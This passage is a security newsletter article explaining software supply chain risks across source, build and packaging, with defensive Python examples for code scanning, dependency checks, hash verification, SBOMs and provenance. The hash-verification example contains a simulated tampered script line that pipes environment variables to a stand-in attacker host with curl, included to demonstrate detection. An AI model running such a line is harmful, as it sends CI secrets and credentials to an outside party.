An Overview of Software Supply Chain Security
A breakdown of what constitutes the software supply chain and how to secure each stage
[tl;dr sec] Now With More Deep Dives
Hello there! A quick note from me (Clint Gibler), the creator of tl;dr sec.
You may already be familiar with how tl;dr sec is a free weekly newsletter round-up of the best articles, tools, and general cybersecurity research.
But we’re also getting more into long form, deep dive content (like how to securely build product features using AI APIs, a Staff Security Engineer Guide, or how to do a risk analysis of Kubernetes clusters).
This time, I’d like to introduce you to Francis Odum, who will be sharing a two-part overview of software supply chain security.
Francis is the author of the software analyst blog. He teaches a cybersecurity & SaaS bootcamp on Maven. He previously led cybersecurity research at the venture capital firm, Contrary, and helped build Contrary Research. Follow him on Twitter @InvestiAnalyst or LinkedIn at Francis Odum.
High-profile incidents such as Microsoft Windows HCP, the SolarWinds attack, the Kaseya ransomware attack, the Codecov attack, and Log4Shell have raised public awareness of the importance of securing software supply chains.
Software supply-chain (SSC) attacks have existed for many years. However, these large breaches have created more awareness of the importance of securing every aspect of the software development lifecycle.
Gartner predicts that by 2025, 45% of organizations worldwide will have experienced attacks on their software supply chains, a 3x rise from 2021. Similarly, a recent study by Juniper estimates that cyberattacks targeting software supply chains could cost organizations $81 billion in lost revenue and damages annually by 2026.
This is an issue for enterprises, governments, and developers. SSC security has become critical enough that governments are now driving action on it. In 2021, the Biden Administration released an executive order addressing SSC risks. This has created a tailwind that has led to a proliferation of companies aiming to protect the supply chain and help organizations comply with the order.
According to data from NightDragon’s software supply chain report, 70% of CISOs said software supply chain is a top investment priority for them in 2023, and over 96% of CISOs said they are using or considering implementing SSC solutions in the next 12 months.
We define software supply chain attacks as those attacks and vulnerabilities that occur during the source, build and package stage of delivering software.
This report is the first in a two-part series exploring software supply chain components. Part 2 is a comprehensive analysis of 12+ SSC vendors and their core differentiators within the software development lifecycle.
This Report In One Minute
Companies are embracing open-source third-party dependencies to ship features to users faster.
Software supply chain security includes using third-party code securely as well as securing the development process from beginning to end.
This report focuses on the following three phases of the software supply chain. Across these phases, we discuss what constitutes software supply chain risks and processes for securing each stage.
Source: This stage constitutes creating the actual code used to build an app. We discuss source code review, managing access to code environments and IDE extensions, and source code management systems (SCM).
Build: This stage compiles and transforms the source code into a deployable form, typically binaries or executable files, and includes the CI/CD pipeline. We discuss risk due to dependencies (unintentionally vulnerable, malicious, transitive, and pipeline dependencies), the CI/CD pipeline, and containers and registries.
Deployment and Package: Bundling software components and dependencies into a deployable format and distributing it for installation on target systems. We discuss Software Bill of Materials (SBOM), code provenance and signatures, and artifact repositories.
By the end of this post, you’ll have a solid overview of the core components of the software supply chain, risks across the chain and how to deploy secure processes at each stage.
If you want to make sure you receive Part 2 of this report, in which we provide a comprehensive analysis of 12+ SSC vendors and their core differentiators, make sure to subscribe to tl;dr sec (if you’re not already), a free weekly update of the best tools, blog posts, and talks in cybersecurity across AppSec, cloud security, AI, supply chain security, and more!
Alright, let’s get into it!
Understanding The Buzz
The proliferation of open-source software in enterprises has created an opportunity for attackers to use open-source components as a means to inflict harm on companies. For example, known attacks on the software supply chain grew over 633% year over year in 2022, and these attacks have seen average growth of over 742%. Similarly, the number of known malicious packages continued to increase significantly in 2022, growing to over 88K instances.
Introduction To Software Supply Chain
Supply chain attacks are difficult to manage because of the many links, interdependencies, and processes that make up current software development practices. This report groups software supply chain attacks into three broad, often intertwined problem areas: source, build, and deployment and package.
The problem of software supply chain security is not entirely new. However, there has been a renewed focus on areas of software development that traditional software security platforms never covered. Many of the legacy providers missed the following problems.
First, many of these companies focused on scanning for vulnerabilities within source code. That focus covered only one segment of the development lifecycle, which created more noise without giving developers actionable feedback. Most of these past solutions stayed at the source code level rather than addressing the deeper intricacies of dependencies within the build and pipeline stages.
Second, many of the legacy players were founded long before the cloud evolved or before open source became extremely popular amongst developers.
The Rise In Open-Source Software (OSS)
What Defines Software Supply Chain (SSC)
To understand SSC security, we must first define SSC and clear up any misconceptions. SSC involves building and producing software, much like assembling ingredients for a burrito wrap or raw materials for a manufacturing plant. The software supply chain includes all the processes, steps, and components you need to create an application. In a traditional supply chain, raw materials are sourced, assembled, and transformed into finished goods before they are distributed to retailers or customers. The same framework applies to the software supply chain.
Applying it to software development
Modern ways of building applications can be categorized into three phases: source, build, and package stages. Each of these stages could be vulnerable to attackers. During the source stage, developers write custom code. The build stage is responsible for assembling the raw files of source code and transforming them into binaries (output used for deployment). Finally, the deployment and package stage gets the final software ready for deployment to production use.
Just as car manufacturers outsource many parts to suppliers or offshore teams to accelerate production, software teams rely on external components from suppliers, namely open-source packages and libraries, to accelerate their delivery cadence.
The three most important phases of the software supply chain as it relates to software development are source, build, and deployment and package. At a basic level, here are some explanations for each category.
Source: Involves creating the actual code used to build an app. It consists of an assembly of a longer list of components, including custom code, open-source dependencies, publicly hosted code repositories, build and packaging scripts, containers, and more.
Build: The process of compiling and transforming the source code into a deployable form, typically binaries or executable files. Agile has changed how software is developed, and many organizations utilize Continuous Integration (CI)/Continuous Delivery (CD), a practice for frequently and automatically building, testing, and deploying software changes. Examples include GitHub Actions or GitLab runners.
Deployment and Package: This involves bundling software components and dependencies, like libraries and resources into a deployable format and distributing it for installation on target systems, streamlining application deployment and updates.
Layers of Software Supply Chain Attacks
With a basic understanding of each of these areas in place, let’s look at how risks can be introduced at each layer.
According to the NIST guide, an SSC attack is when a malicious party tampers with steps, artifacts, or actors within the chain to compromise the consumers of a software artifact down the line. In order to carry out an SSC attack, an attacker needs to subvert, remove, or introduce a step within the SSC process to modify the resulting software product. The chart below shows the various areas where an attacker could launch an attack against the supply chain.
The Supply Chain Levels for Software Artifacts (SLSA) framework is another important framework used to understand each layer of attack. The SLSA (pronounced “salsa”) framework provides a checklist of standards and controls to prevent tampering, improve integrity, and secure open-source packages. SLSA breaks down the three categories (source, build and deployment) into eight distinct types of threats that could occur at each stage.
The rest of the report uses the NIST and SLSA definitions of the source, build, and deployment/package stages to explore each of these areas in more depth:
The Source Code Layer
The Build and Pipeline Layer
The Packaging and Deployment Layer
Source Code Layer
Source code review
Managing access to code environments and IDE extensions
Source code management systems (SCM)
Source code review
Code is the first and core ingredient in the software supply chain used to build the end product, an application. This code can be developed in-house or come from external sources. As code passes through different hands, vulnerabilities can be introduced at several points.
First, as developers commit changes to source code in a version control system (VCS), there is always a risk that an internal bad actor could modify the source code or the controls on the code repository that hosts it. Some of these issues can be mitigated by code reviews, in which one or more developers analyze a teammate’s code to identify poorly written code, bugs, or errors. Code changes can be submitted as pull requests (or merge requests), and reviews can be conducted before the changes are merged into the main codebase.
In addition to code reviews, many companies leverage a static application security testing (SAST) tool that continuously scans all new code and existing code for vulnerabilities. You can think of SAST tools, when used properly, as scaling secure code review across every pull request on every code repository.
Historically, companies used heavyweight, legacy SAST tools to try to “find every vulnerability,” leading to large numbers of false positives and heavy operational costs for security and development teams. Over the past few years, some modern, engineering-focused security teams have been leaning into the concept of “secure defaults” (or, to use Netflix’s term, building a “paved road”). The idea is that the build tools, libraries, and processes make it easy for developers to do things the secure way, and hard to proceed insecurely, thus preventing entire vulnerability classes from occurring in the first place. See Figma Head of Security Dev Akhawe’s Modern Static Analysis blog post, this Global AppSec SF talk, and this BSidesSF talk for more.
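To make the idea of a small, targeted check more concrete, here is a minimal Python sketch that flags two risky patterns using the standard-library ast module. The rule set (eval/exec calls and shell=True) and the function name find_risky_calls are our own illustrative assumptions, not the rules of any particular SAST product.

```python
import ast

# Illustrative rule set (an assumption for this sketch, not from a real tool).
BANNED_CALLS = {"eval", "exec"}


def find_risky_calls(source: str) -> list[tuple[int, str]]:
    """Return (line_number, message) pairs for risky patterns in `source`."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        # Rule 1: direct calls to eval() or exec().
        if isinstance(node.func, ast.Name) and node.func.id in BANNED_CALLS:
            findings.append((node.lineno, f"call to {node.func.id}()"))
        # Rule 2: any call that passes the literal keyword argument shell=True.
        for kw in node.keywords:
            if (
                kw.arg == "shell"
                and isinstance(kw.value, ast.Constant)
                and kw.value.value is True
            ):
                findings.append((node.lineno, "shell=True in call"))
    return sorted(findings)


if __name__ == "__main__":
    sample = (
        "import subprocess\n"
        "subprocess.run(cmd, shell=True)\n"
        "result = eval(user_input)\n"
    )
    for line, message in find_risky_calls(sample):
        print(f"line {line}: {message}")
```

A check like this could run on every pull request. In a "paved road" setup it would typically be paired with a safe wrapper that developers are steered toward instead of the flagged pattern.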
Securing source code management (SCM) systems
Source code leakage has become a major issue, such as the attack in 2022 where Microsoft had its source code leaked by the hacking group Lapsus$. The group alleges they released source code for Bing, Cortana, and other projects stolen from Microsoft's internal Azure DevOps server.
With source code management systems (SCM) like GitHub or GitLab acting as the central hub for the developer’s software development lifecycle, securing these SCMs has become paramount. Developers use these code repositories to store and organize their code while using version control systems like Git to manage and track changes to the source code. By compromising a code repository through unauthorized access, an attacker can gain access to the software’s source code, inject malicious code, hijack credentials, or even provision vulnerable infrastructure.
💡 The Importance of Branch Protection: $3M USD Crypto Heist
Another SSC attack saw over $3M USD stolen in a crypto heist after an “anonymous contractor” changed the wallet address in the front-end code of a crypto auction site, replacing the authentic wallet address with their own. The studio’s repo had a procedure requiring PRs to be opened on the dev branch and reviewed before merging into the master branch. However, this process was not enforced by Git branch protection settings.
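The gap between "we have a review process" and "the process is enforced" can be checked mechanically. Below is a minimal Python sketch that audits a branch's protection settings. The field names are modeled loosely on the shape of GitHub's branch protection API response, which is an assumption of this sketch, and the function name branch_protection_gaps is hypothetical. Fetching the settings from a real SCM is left out.

```python
from typing import Optional


def branch_protection_gaps(protection: Optional[dict]) -> list[str]:
    """List the ways a branch's settings fail to enforce review-before-merge.

    `protection` is a settings dictionary whose field names are modeled
    loosely on GitHub's branch protection API response (an assumption of this
    sketch). None means the branch has no protection configured at all.
    """
    if protection is None:
        return ["branch has no protection rules"]

    gaps = []
    reviews = protection.get("required_pull_request_reviews") or {}
    if reviews.get("required_approving_review_count", 0) < 1:
        gaps.append("merges do not require an approving review")
    if not (protection.get("enforce_admins") or {}).get("enabled", False):
        gaps.append("administrators can bypass the rules")
    if (protection.get("allow_force_pushes") or {}).get("enabled", False):
        gaps.append("force pushes are allowed")
    return gaps


if __name__ == "__main__":
    # A branch where review is only a convention, not an enforced rule.
    for gap in branch_protection_gaps(None):
        print("gap:", gap)
```

Running an audit like this across every repository is one way to catch branches where review is a convention rather than a control.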
Managing access to code environments and IDE extensions
Integrated Development Environments (IDEs) and code editors like Microsoft’s Visual Studio Code (VS Code) have become indispensable tools for developers today. They enable developers to customize their development environments and streamline various aspects of the development process. As these tools have grown in popularity, developers may unknowingly install malicious extensions, such as an infected VS Code extension. Some of these extensions may come from open-source packages that in turn depend on third-party libraries. Risks arise when these extensions gain access to code repos and compromise the security of the IDE, for example by stealing sensitive data or injecting malware into a codebase.
The Build & Pipeline Layer
The build stage is responsible for pulling together the various code components and compiling the source code into a deployable form, such as binaries, executable files, or code libraries. During this stage, all dependencies, configuration files, and assets are pulled into a distributable form for a target environment.
Across the build pipeline, development teams have to protect containers and build automation tools like Apache Maven or GitLab CI/CD. These tools facilitate the building, testing, and deployment of applications. If the build environment is not secure or there are weaknesses in the build scripts, attackers can exploit vulnerabilities in build tools, servers, or the CI/CD pipeline itself to compromise the build process, leading to vulnerabilities in the final software.
Software supply chain attacks could happen during the build stage when the following are incorporated:
Dependencies (Unintentionally vulnerable, malicious, transitive and pipeline)
Containers and registries
Dependencies play a key role across most stages of SDLC, but primarily in the build pipeline stage since they help speed up development of new applications. Dependencies in the context of software supply chain refer to external software components, such as libraries, modules, packages or frameworks that a particular software application or project relies on to function properly.
💡 Examples of dependencies
For example, when a developer runs npm install, npm resolves and fetches the project’s dependencies from the npm registry. It also simplifies the process of updating dependencies. Another example of a third-party dependency is a package like React-app.
Categories of third-party dependencies
Dependencies are third-party software ‘borrowed’ and downloaded through open-source tools to provide functionality for an application. At a high level, there are two ways third-party dependencies can introduce risk:
Unintentionally vulnerable code
Intentionally malicious code.
Though the source of risk in both cases is third-party dependencies, how one detects and mitigates these risks is meaningfully different, so we’ll discuss them separately. We’ll also provide an in-depth discussion on the importance of SCA tools and their relationship to dependencies.
1) Unintentionally Vulnerable Code
This refers to code within a third-party dependency that contains security vulnerabilities or weaknesses that were not intentionally inserted by the developer of the dependency. These vulnerabilities are often the result of coding errors or poor development practices. They may include issues like buffer overflows, injection vulnerabilities, or incorrect data validation. The industry term for the class of tools that identifies vulnerable dependencies is Software Composition Analysis (SCA). In part 2 of our report, we provide an extensive discussion on the importance of SCA solutions and their role in preventing vulnerabilities within dependencies.
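At its core, the matching an SCA tool performs can be pictured as comparing installed versions against a feed of known advisories. The Python sketch below shows that idea only. The package names, advisory IDs, and the ADVISORIES feed are all hypothetical, and the version parser assumes purely numeric dotted versions. Real tools handle version ranges, ecosystems, and pre-release tags.

```python
def parse_version(version: str) -> tuple[int, ...]:
    """Parse a purely numeric dotted version such as '2.3.31'."""
    return tuple(int(part) for part in version.split("."))


# Hypothetical advisory feed: package -> list of (advisory id, first fixed version).
ADVISORIES = {
    "example-web-framework": [("EXAMPLE-2023-0001", "2.3.32")],
    "example-logger": [("EXAMPLE-2023-0002", "1.4.0")],
}


def vulnerable_dependencies(installed: dict[str, str]) -> list[tuple[str, str, str]]:
    """Return (package, installed_version, advisory_id) for unpatched packages."""
    findings = []
    for package, version in sorted(installed.items()):
        for advisory_id, fixed_in in ADVISORIES.get(package, []):
            # Anything older than the first fixed version is treated as affected.
            if parse_version(version) < parse_version(fixed_in):
                findings.append((package, version, advisory_id))
    return findings


if __name__ == "__main__":
    installed = {
        "example-web-framework": "2.3.31",  # one patch behind the fix
        "example-logger": "1.4.2",          # already patched
    }
    for package, version, advisory_id in vulnerable_dependencies(installed):
        print(f"{package} {version} is affected by {advisory_id}")
```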
💡 Famous example: Equifax
The infamous 2017 Equifax data breach is an example of the use of a vulnerable third-party dependency. The company had been using the open-source Apache Struts as its website framework for systems handling credit disputes from consumers, and had failed to update this software with a key security patch after the discovery of a critical exploit in the code. Within two months of the patch’s announcement, hackers had discovered and then used the vulnerability to gain access to Equifax’s internal servers and expose the private records of over 147 million Americans and 15 million British citizens, ultimately costing the company up to $700M.
In some cases, developers may download a library that has vulnerable or malicious transitive dependencies, but may be unaware of the risks because the direct libraries do not explicitly mention them in their configuration files. One of the biggest complaints security advocates have about the state of SBOMs today is that they still struggle to communicate transitive dependencies related to the enumerated software, which we’ll discuss further in part 2 of this report.
🌶️ Transitive Dependencies: Our Take
While some SCA tools tout their ability to find vulnerable transitive dependencies, we believe this is actually low value.
Actual risk is low. The likelihood that an attacker can provide malicious input that makes its way through your first-party code, to the direct dependency, to the vulnerable function in the transitive dependency is quite low in practice. Perhaps for the once-a-year everything-is-on-fire vulnerabilities (like log4shell) there’s risk, but other than that, it’s unlikely.
Difficult to fix. Even if the transitive dependency is exploitable, your remediation options are to try to get fixes into one or both of the dependencies (which you don’t directly control), fork a dependency and patch your own version, or switch to a dependency that provides similar functionality, which may require rewriting a fair amount of your code. None of these are great options.
We note that the risk posed by malicious transitive dependencies is a valid concern (see the event-stream example below), as they are likely written to perform malicious functionality every time, regardless of how the library is used.
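To make "transitive" concrete, here is a small Python sketch that walks a dependency graph and reports every indirect dependency, along with one chain of packages that pulls it in. The graph and all package names are hypothetical. In practice this information would come from a lockfile or a package manager's resolver.

```python
from collections import deque

# Hypothetical dependency graph: package -> packages it directly depends on.
DEPENDENCY_GRAPH = {
    "my-app": ["web-framework", "http-client"],
    "web-framework": ["template-engine"],
    "http-client": ["tls-lib"],
    "template-engine": ["string-utils"],
    "tls-lib": [],
    "string-utils": [],
}


def transitive_dependencies(graph: dict[str, list[str]], root: str) -> dict[str, list[str]]:
    """Map each indirect dependency of `root` to one path that pulls it in."""
    direct = graph.get(root, [])
    seen = {root, *direct}
    paths = {}
    # Breadth-first search, starting from each direct dependency.
    queue = deque([[dep] for dep in direct])
    while queue:
        path = queue.popleft()
        for child in graph.get(path[-1], []):
            if child in seen:
                continue
            seen.add(child)
            paths[child] = path + [child]
            queue.append(path + [child])
    return paths


if __name__ == "__main__":
    for package, path in transitive_dependencies(DEPENDENCY_GRAPH, "my-app").items():
        print(f"{package}: my-app -> " + " -> ".join(path))
```

The recorded path also illustrates the remediation problem described above: fixing string-utils means going through template-engine and web-framework, neither of which the application team controls.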
2) Malicious Dependencies / Intentionally malicious code
This refers to code that has been intentionally inserted into a third-party dependency with the purpose of compromising the security or functionality of the software using that dependency.
This particular risk has become more prominent in recent years. These attacks could be perpetrated by hackers with financial motives or nation-states who want to steal company IP, access national secrets, obtain personal information on many individuals (which could later be used for blackmail or espionage), or even preemptively gain the upper hand in future military conflict, for example, gaining privileged access to the electric grid or other industrial control systems.
💡 Intentional, Malicious Code example: event-stream attack
Attackers can use a variety of methods to inject malicious code into the code that defines the build process. These malicious items could be injected into CI scripts, or the build tooling configurations through 3rd party plugins, or tooling binaries. If this happens, the build process itself is compromised and used to distribute malicious code to downstream consumers.
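One commonly recommended mitigation for third-party plugins in CI scripts is to reference them by an immutable commit hash rather than a movable tag or branch. As a rough illustration, the Python sketch below scans the text of a GitHub Actions style workflow for uses: entries that are not pinned to a full 40-character commit SHA. The regular expressions and the function name unpinned_actions are our own assumptions. A production check would parse the YAML properly.

```python
import re

# Matches lines such as "  - uses: owner/action@ref" or "    uses: owner/action@ref".
USES_PATTERN = re.compile(r"^\s*(?:-\s*)?uses:\s*([^\s@#]+)@([^\s#]+)")
FULL_COMMIT_SHA = re.compile(r"^[0-9a-f]{40}$")


def unpinned_actions(workflow_text: str) -> list[tuple[int, str, str]]:
    """Return (line_number, action, ref) for `uses:` entries not pinned to a commit SHA."""
    findings = []
    for number, line in enumerate(workflow_text.splitlines(), start=1):
        match = USES_PATTERN.match(line)
        if match and not FULL_COMMIT_SHA.match(match.group(2)):
            findings.append((number, match.group(1), match.group(2)))
    return findings


if __name__ == "__main__":
    # Hypothetical workflow snippet; the action names are placeholders.
    workflow = (
        "steps:\n"
        "  - uses: example-org/build-action@v2\n"
        "  - uses: example-org/scan-action@" + "0123456789abcdef" * 2 + "01234567\n"
    )
    for number, action, ref in unpinned_actions(workflow):
        print(f"line {number}: {action} is referenced by movable ref '{ref}'")
```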
💡 Malicious Code Injected in Pipeline: SolarWinds, CodeCov
In the case of SolarWinds, malicious code was injected into the Orion product build by the perpetrators gaining access to SolarWinds’ build systems. The backdoors were then deployed to roughly 18,000 customers who automatically pulled the malicious updates.
In the Codecov breach, attackers obtained credentials from a Docker image and used them to compromise a Bash Uploader script that many of their customers used in their CI environments.
By being able to run arbitrary code in Codecov customer CI environments, the attackers could access CI environment variables containing keys, credentials, and tokens that could be used to pivot deeper into the victim’s infrastructure, potentially accessing source code or production data, spinning up cryptominers, etc.
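One general defense against a tampered script being pulled into CI is to verify it against a known-good digest before running it. The Python sketch below shows that check in isolation. The function name verify_sha256 and the sample script contents are illustrative assumptions, and in practice the expected digest would be obtained out of band (for example, pinned in the repository) rather than computed on the spot.

```python
import hashlib
import hmac


def verify_sha256(content: bytes, expected_hex: str) -> bool:
    """Return True only if `content` hashes to the expected SHA-256 digest."""
    actual_hex = hashlib.sha256(content).hexdigest()
    # compare_digest avoids leaking where the two strings first differ.
    return hmac.compare_digest(actual_hex, expected_hex.lower())


if __name__ == "__main__":
    # Stand-ins for a reviewed script and a later, modified download.
    reviewed_script = b"#!/bin/sh\necho 'uploading coverage report'\n"
    pinned_digest = hashlib.sha256(reviewed_script).hexdigest()

    downloaded = reviewed_script + b"env | curl -d @- https://attacker.example\n"
    if verify_sha256(downloaded, pinned_digest):
        print("digest matches, safe to execute")
    else:
        print("digest mismatch, refusing to execute")
```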
A CI/CD (Continuous Integration/Continuous Delivery) pipeline is an automated process that helps software development teams build, test, and deploy code changes efficiently and consistently. It automates these tasks, ensuring that software is continuously updated and delivered to users with minimal manual intervention. CI/CD pipelines use processes called workflows to transform source code into deployable packages for production environments. Popular solutions include GitHub Actions workflows or GitLab Runner.
Although the goal of CI/CD is to ensure that code changes are thoroughly tested and quickly released to users, developers often make costly mistakes that expose their company to risk, such as introducing vulnerabilities in first-party code, pulling in vulnerable third-party code, or running insecure build systems.
Attackers target CI/CD pipelines to introduce vulnerabilities or malicious code in workflows, which can then be deployed to production environments. If build artifacts (compiled code, binaries, or packages) are not properly secured and validated, attackers could tamper with them during the deployment process. Unauthorized access to a CI/CD pipeline can also lead to code tampering or unauthorized deployments.
NIST published some guidelines on protecting CI/CD:
Incorporate a range of defensive measures to ensure that attackers cannot tamper with software production processes or introduce malicious software updates (e.g., secure platform for build process).
Ensure the integrity of the CI/CD pipeline artifacts (e.g., repositories) and activities through role definitions and authorizations for actors.
Containers and Registries
Containers play a pivotal role in the software supply chain, particularly in modern application build and deployment workflows. Developers use them to build, test and package their applications in portable ways, so they can work across multiple environments. Developers have also recently faced challenges around many container images having no provenance information, making it difficult to verify where they came from or if someone has tampered with them. Well-intentioned developers sometimes install these packages and run images with known vulnerabilities.
Whether it’s Docker images or Kubernetes, container technologies have become an indispensable component of CI/CD pipelines, especially for testing in various environments, whether staging or production. Container registries like Docker Hub or Amazon's Elastic Container Registry (ECR), which are centralized locations for storing, distributing, and downloading container images, have become a key focus for malicious actors. If attackers gain credentials for a registry, they can create and upload malicious container images to public or private registries. Unsuspecting developers may inadvertently use these images in their applications, leading to security breaches.
Developers who want to build containerized applications will generally start from a base image like Ubuntu or Red Hat OpenShift, pulled from Docker Hub. Attackers can compromise these dependencies, leading to vulnerabilities in the containerized application. For example, it was discovered that over 1,600 publicly available Docker Hub images were hiding malicious behavior, including embedded secrets that could be used as backdoors for attackers.
Finally, it’s important to note that teams that don’t use reproducible, deterministic builds, in which building software from the same source code results in identical binary outputs each time, may be more vulnerable to supply chain attacks. Without this practice, teams run the risk of malicious actors injecting changes during the build that go unnoticed, yielding binaries that do not match their source. By ensuring that the resulting binaries are consistent and verifiable, these practices enhance trust, because third parties can independently verify that the software matches the claimed source code.
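As a toy illustration of what "deterministic" means in practice, the Python sketch below packs files into a tar archive while fixing the things that usually vary between builds (file order, timestamps, ownership), then compares digests from two runs. The helper names build_archive and sha256_hex are our own, and real build systems have many more sources of non-determinism than this example covers.

```python
import hashlib
import io
import tarfile


def build_archive(files: dict[str, bytes]) -> bytes:
    """Pack files into a tar archive with no environment-dependent metadata."""
    buffer = io.BytesIO()
    with tarfile.open(fileobj=buffer, mode="w", format=tarfile.USTAR_FORMAT) as archive:
        for name in sorted(files):  # fixed file order
            info = tarfile.TarInfo(name=name)
            info.size = len(files[name])
            info.mtime = 0           # fixed timestamp instead of "now"
            info.mode = 0o644        # fixed permissions
            info.uid = info.gid = 0  # no builder-specific ownership
            info.uname = info.gname = ""
            archive.addfile(info, io.BytesIO(files[name]))
    return buffer.getvalue()


def sha256_hex(data: bytes) -> str:
    """Hex SHA-256 digest, used to compare independent builds."""
    return hashlib.sha256(data).hexdigest()


if __name__ == "__main__":
    source = {"app.py": b"print('hello')\n", "README": b"demo\n"}
    first = sha256_hex(build_archive(source))
    # A second "builder" that happens to enumerate the files in another order.
    second = sha256_hex(build_archive(dict(reversed(list(source.items())))))
    print("reproducible:", first == second)
```

If a third party rebuilding from the same source gets a different digest, either the build is not deterministic or something was changed along the way. Both cases are worth investigating.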
The Packaging & Deployment Layer
The final stages of software development involve bundling the software and its dependencies into a distributable package for deployment into production environments. Alternatively, most cloud-native companies build applications into a container that they then run on some sort of container orchestration platform, like Kubernetes.
Software is packaged into distributable artifacts, which can be in the form of installer packages like Caphyon, container images, or other formats, so it can be easily distributed, deployed, and installed on different systems. At this stage, it’s critical that development teams implement tools that give them transparency into, and confidence in the integrity of, every line of code. This is why we’ve focused on discussing SBOMs and code provenance in this section.
Software supply chain attacks may occur when an attacker tampers with the packaging process, for example through a package manager such as Yarn, to insert malicious code or alter package metadata, leading to compromised software distributions. Attacks are also possible on mirrors of popular package repos. For example, as part of the Codecov attack, leaked credentials were used to upload malicious artifacts to a GCS bucket.
The package and deploy stage covers the following:
Software Bill of Materials (SBOM)
Code provenance and signatures
Software Bill of Materials (SBOM)
Closer to the packaging and deployment stage, teams may use SBOMs to filter out bad dependencies and vulnerabilities introduced anywhere from the source code to the build stage. An SBOM is a machine-readable inventory of software components, build tools, and dependencies derived from the use of open-source and third-party libraries.
A common analogy is reviewing the list of ingredients on food packaging or determining what is inside a burrito package. An SBOM is meant to provide details on the different components included within a software product, including name, version, license, vulnerabilities, etc.
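To show what "machine-readable inventory" looks like, here is a minimal Python sketch that assembles a CycloneDX-style document from a list of components. It is a simplified sketch, not validated against the CycloneDX schema. The component names are hypothetical, and a real SBOM would normally be produced by a generator tool and carry more metadata.

```python
import json


def make_sbom(components: list[dict]) -> dict:
    """Build a minimal, CycloneDX-style SBOM document (simplified sketch)."""
    return {
        "bomFormat": "CycloneDX",
        "specVersion": "1.5",
        "version": 1,
        "components": [
            {
                "type": "library",
                "name": c["name"],
                "version": c["version"],
                "licenses": [{"license": {"id": c["license"]}}],
            }
            # Sorted so the same inputs always produce the same document.
            for c in sorted(components, key=lambda c: (c["name"], c["version"]))
        ],
    }


if __name__ == "__main__":
    # Hypothetical components, standing in for what a build actually pulled in.
    sbom = make_sbom(
        [
            {"name": "example-http-client", "version": "3.2.1", "license": "Apache-2.0"},
            {"name": "example-json-parser", "version": "1.0.4", "license": "MIT"},
        ]
    )
    print(json.dumps(sbom, indent=2))
```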
SBOMs originally evolved out of licensing and infringement disputes with people who built proprietary software on top of open source without crediting the creators of the dependencies they used. OWASP CycloneDX and SPDX were developed to create open standards for SBOMs. However, the 2021 Biden executive order on formalizing software supply chain standards played a key role in the adoption and standardization of SBOMs.
SBOM enrichment and aggregation: In recent years, complaints about SBOMs have included a lack of robustness, especially when it comes to keeping up with newer open-source dependencies. Other issues include how to aggregate and enrich these SBOM artifacts; aggregating SBOM information across software portfolios and lines of business will be a growing concern for security leaders. Hence, some organizations create their own SBOMs in addition to ingesting SBOMs from their vendors. Some organizations also add Vulnerability Exploitability eXchange (VEX) documents, in which a supplier states whether a given software product is affected by a known vulnerability. SBOM providers will generally integrate VEX into their solutions as a companion, because an SBOM on its own only lists the components within software and does not indicate which known vulnerabilities are actually exploitable.
Alternatively, OpenSSF Scorecard, an automated scanning tool, can perform a number of checks on the security posture of an open-source project (e.g., is it using security tools like SAST or fuzzing, does it follow build pipeline best practices like requiring code reviews and using branch protection, etc.), which can be used to contextualize and enrich SBOMs.
Code provenance and signatures
Without knowing the origin of code components, it's challenging to verify the integrity of software. Code from unknown sources may have poor quality, lack documentation, or vulnerabilities leading to software defects and reliability issues. This is where code provenance plays a critical role.
Code provenance allows developers to trace the origin and history of a piece of code or software component, including its authorship, modifications, and any intermediaries it passed through during its development lifecycle. Essentially, it's about knowing where your code comes from and understanding its journey from inception to deployment. In the context of the software supply chain, code provenance is crucial for security, traceability, and verifying the integrity of code. It helps ensure that the code you incorporate into your software is trustworthy and hasn't been tampered with or compromised by malicious actors. Heavily regulated industries like the financial and healthcare sectors have to adopt these practices to meet compliance requirements.
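As a rough picture of how a provenance record gets used, the Python sketch below checks an artifact against a simplified, SLSA-style provenance statement: the artifact's digest must appear among the statement's subjects, and the builder must be on a trusted list. The statement layout is abbreviated, and the builder URL and the function name check_provenance are hypothetical. A real verifier must first validate the signature on the statement itself, which this sketch deliberately skips.

```python
import hashlib

# Hypothetical allowlist of build systems we are willing to trust.
TRUSTED_BUILDERS = {"https://builder.example.com/trusted-ci"}


def check_provenance(artifact: bytes, statement: dict) -> list[str]:
    """Return a list of problems found; an empty list means the checks passed.

    NOTE: this sketch assumes the statement's signature was already verified.
    """
    problems = []

    # 1. The artifact we hold must be one of the statement's subjects.
    digest = hashlib.sha256(artifact).hexdigest()
    subject_digests = {
        subject.get("digest", {}).get("sha256")
        for subject in statement.get("subject", [])
    }
    if digest not in subject_digests:
        problems.append("artifact digest is not listed as a subject")

    # 2. The build must have run on a builder we trust.
    builder_id = (
        statement.get("predicate", {})
        .get("runDetails", {})
        .get("builder", {})
        .get("id")
    )
    if builder_id not in TRUSTED_BUILDERS:
        problems.append(f"untrusted builder: {builder_id}")

    return problems


if __name__ == "__main__":
    artifact = b"pretend this is a compiled binary"
    statement = {
        "subject": [{"name": "app", "digest": {"sha256": hashlib.sha256(artifact).hexdigest()}}],
        "predicate": {"runDetails": {"builder": {"id": "https://builder.example.com/trusted-ci"}}},
    }
    print(check_provenance(artifact, statement) or "provenance checks passed")
```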
Code signing is increasingly becoming the best practice for ensuring the integrity of code. Because signatures are relied on as developers commit and deploy software over its lifecycle, code signing certificates are a favored target for software supply chain attackers. Solutions like Sigstore, which handles signing and verification, have become standards for ensuring supply chain integrity for both developers and users. Code-signing vendors include Garantir, CircleCI, GitHub Cosign, and Venafi.
Artifacts in software development refer to the output of a build process, such as compiled code, libraries, or executable files. An artifact repository, like JFrog, is a centralized storage location that securely stores and manages these artifacts. Its role is to provide a reliable and organized way to store, version, and distribute software components, making it easier for developers to collaborate, build, and deploy software.
In the software supply chain, artifacts and artifact repositories play a crucial role in version control, dependency management, and reproducible builds. They help ensure that software components are consistently built, tested, and delivered, streamlining the deployment process.
Software supply chain attacks can occur when an artifact repo is not properly secured and unauthorized users gain access to tamper with artifacts. Attackers might inject malware into artifacts, especially if the repository lacks proper scanning and validation mechanisms. If artifacts are not treated as immutable (unchangeable), it's possible for them to be altered after they are stored in the repository.
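The immutability property can be illustrated with a tiny in-memory stand-in for an artifact repository. In the Python sketch below, a published name and version can never be overwritten, and consumers fetch by expected digest so that any substitution is detected. The ImmutableArtifactStore class is hypothetical and only models the policy, not a real repository product.

```python
import hashlib


class ImmutableArtifactStore:
    """In-memory stand-in for an artifact repository that never overwrites."""

    def __init__(self) -> None:
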